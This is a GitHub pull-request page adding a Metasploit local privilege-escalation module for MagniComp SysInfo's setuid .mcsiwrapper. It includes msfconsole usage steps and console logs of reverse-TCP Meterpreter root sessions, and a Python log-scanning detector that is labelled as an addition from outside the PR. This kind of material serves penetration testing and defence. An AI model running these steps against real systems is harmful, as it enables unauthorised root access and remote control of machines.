
Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit #9504

Merged
merged 3 commits into from Feb 20, 2018

Conversation

@bcoles
Contributor

bcoles commented Feb 5, 2018

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit.

        This module attempts to gain root privileges on systems running
        MagniComp SysInfo versions prior to 10-H64.

        The .mcsiwrapper suid executable allows loading a config file using the
        '--configfile' argument. The 'ExecPath' config directive is used to set
        the executable load path. This module abuses this functionality to set
        the load path resulting in execution of arbitrary code as root.

        This module has been tested successfully with SysInfo version
        10-H63 on Fedora 20 x86_64 and 10-GA on Solaris 10u11 x86.

Verification

  • Start msfconsole
  • Get a session
  • use multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
session => 1
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Using target: Linux
[*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
[*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
[+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
[+] Deleted /tmp/.0rk4PC/eoGVzYwGa
[+] Deleted /tmp/.0rk4PC

meterpreter > getuid
Server username: uid=0, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
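One defensive angle on the behaviour the module description relies on: a setuid `.mcsiwrapper` that is handed a `--configfile` from a user-writable location can have its `ExecPath` redirected. The script below is an added example, not part of this PR or of the Metasploit module, that scans constructed audit-style execve records for exactly that pattern. The log format, the vendor config directory `/opt/sysinfo/etc/` and the `--configfile=PATH` spelling are assumptions; the `/tmp/.0rk4PC/...` path is reused from the output above.

```python
import os
import re
import shlex
from typing import Dict, List, Tuple

# Constructed sample records in a simplified audit-style format (not real
# auditd output): the executed binary plus its full argument vector. The
# first line reuses the temporary config path seen in the module output.
SAMPLE_LOG = """\
type=EXECVE exe=/opt/sysinfo/bin/.mcsiwrapper argv="/opt/sysinfo/bin/.mcsiwrapper --configfile /tmp/.0rk4PC/eoGVzYwGa"
type=EXECVE exe=/opt/sysinfo/bin/.mcsiwrapper argv="/opt/sysinfo/bin/.mcsiwrapper --configfile=/opt/sysinfo/etc/mcsi.conf"
type=EXECVE exe=/opt/sysinfo/bin/.mcsiwrapper argv="/opt/sysinfo/bin/.mcsiwrapper --configfile /opt/sysinfo/etc/../../../tmp/evil.conf"
type=EXECVE exe=/opt/sysinfo/bin/.mcsiwrapper argv="/opt/sysinfo/bin/.mcsiwrapper -v"
type=EXECVE exe=/usr/bin/ls argv="ls -la /tmp"
"""

# Assumption: the vendor-managed directory that holds the legitimate config.
TRUSTED_CONFIG_DIRS: Tuple[str, ...] = ("/opt/sysinfo/etc/",)

RECORD_RE = re.compile(r'exe=(?P<exe>\S+)\s+argv="(?P<argv>[^"]*)"')


def configfile_argument(argv: List[str]) -> str:
    """Return the path passed via '--configfile PATH' or '--configfile=PATH'
    (the second form is assumed), or '' when the flag is absent."""
    for i, arg in enumerate(argv):
        if arg == "--configfile" and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--configfile="):
            return arg.split("=", 1)[1]
    return ""


def find_untrusted_configfile_execs(
    log_text: str, trusted_dirs: Tuple[str, ...] = TRUSTED_CONFIG_DIRS
) -> List[Dict[str, str]]:
    """Flag .mcsiwrapper executions whose --configfile lies outside the trusted
    directories. Paths are normalised first so '..' traversal out of a
    trusted directory is still caught."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = RECORD_RE.search(line)
        if not m or not m.group("exe").endswith("/.mcsiwrapper"):
            continue
        path = configfile_argument(shlex.split(m.group("argv")))
        if path and not os.path.normpath(path).startswith(trusted_dirs):
            hits.append({"exe": m.group("exe"), "configfile": os.path.normpath(path)})
    return hits
```

Running `find_untrusted_configfile_execs(SAMPLE_LOG)` on the constructed records flags the `/tmp` config and the traversal case while leaving the vendor config and the non-config invocations alone.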
@bcoles bcoles added module docs labels Feb 5, 2018
@Chiggins

Contributor

Chiggins commented Feb 7, 2018

If anyone doesn't mind, I'm going to self assign for my first PR as a committer. 💯

@Chiggins Chiggins self-assigned this Feb 7, 2018
@busterb

Member

busterb commented Feb 7, 2018

Go for it!

@Chiggins

Contributor

Chiggins commented Feb 7, 2018

Tested against Fedora 27 and it worked like a charm!

msf5 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.252:4445 
[*] Using target: Linux
[*] Writing '/tmp/.Duxko1/9M2WGR' (21 bytes) ...
[*] Writing '/tmp/.Duxko1/zuc5EBYz' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 192.168.1.162

meterpreter > sysinfo 
Computer     : fedora27.chigs.local
OS           : Fedora 27 (Linux 4.13.9-300.fc27.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid 
Server username: uid=0, gid=1000, euid=0, egid=1000

@Chiggins Chiggins merged commit 1177efe into rapid7:master Feb 20, 2018
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
Chiggins added a commit that referenced this pull request Feb 20, 2018
@bcoles bcoles deleted the bcoles:magnicomp_sysinfo_mcsiwrapper_priv_esc branch Feb 20, 2018
jmartin-r7 added a commit that referenced this pull request Feb 20, 2018